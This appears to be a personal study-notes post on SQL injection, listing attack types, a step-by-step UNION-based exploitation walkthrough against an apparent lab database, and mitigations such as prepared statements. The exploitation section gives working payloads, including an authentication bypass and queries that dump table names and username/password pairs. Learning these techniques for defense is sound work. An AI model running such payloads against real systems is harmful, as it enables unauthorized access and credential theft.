SQL Injection

May 18, 2025

Definition

The point where in a web application using SQL can turn into SQL Injection is when user-provided data gets included in the SQL query.

Types

  1. In-Band SQLi

    1. Discovering an SQL Injection vulnerability on a website page and then being able to extract data from the database to the same page.

  2. Error-Based SQLi

    1. As error messages from the database are printed directly to the browser screen.

  3. Union-Based SQLi

    1. This type of Injection utilises the SQL UNION operator alongside a SELECT statement to return additional results to the page.
    2. This method is the most common way of extracting large amounts of data via an SQL Injection vulnerability.

  4. Blind SQLi

    1. Authentication bypass ' OR 1=1;--
    2. Boolean-Based
    3. Time-Based

  5. Out-of-Bound SQLi

    1. An Out-Of-Band attack is classified by having two different communication channels, one to launch the attack and the other to gather the results. For example, the attack channel could be a web request, and the data gathering channel could be monitoring HTTP/DNS requests made to a service you control.

Exploiting

  1. Recon: we need to search for errors usually by adding ’ or "
  2. we still in recon we need to get the number of columns we can start trying by UNION 1,...,n till we get no error so we have n columns
  3. let’s get database name by using the database() function instead of any number in the UNION
  4. Let’s know more about the tables in the database by using this 0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
  5. let’s dig deeper in the found tables by using this 0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
  6. then we use this to list all the data in the table staff_users 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users

Mitigation

  1. Prepared Statements (With Parameterized Queries):

    • In a prepared query, the first thing a developer writes is the SQL query, and then any user inputs are added as parameters afterwards. Writing prepared statements ensures the SQL code structure doesn’t change and the database can distinguish between the query and the data. As a benefit, it also makes your code look much cleaner and easier to read.

  2. Input Validation:

    • Input validation can go a long way to protecting what gets put into an SQL query. Employing an allow list can restrict input to only certain strings, or a string replacement method in the programming language can filter the characters you wish to allow or disallow. 

  3. Escaping User Input:

    • Allowing user input containing characters such as ’ " $ \ can cause SQL Queries to break or, even worse, as we’ve learnt, open them up for injection attacks. Escaping user input is the method of prepending a backslash (****) to these characters, which then causes them to be parsed just as a regular string and not a special character.

Tags:

Categories: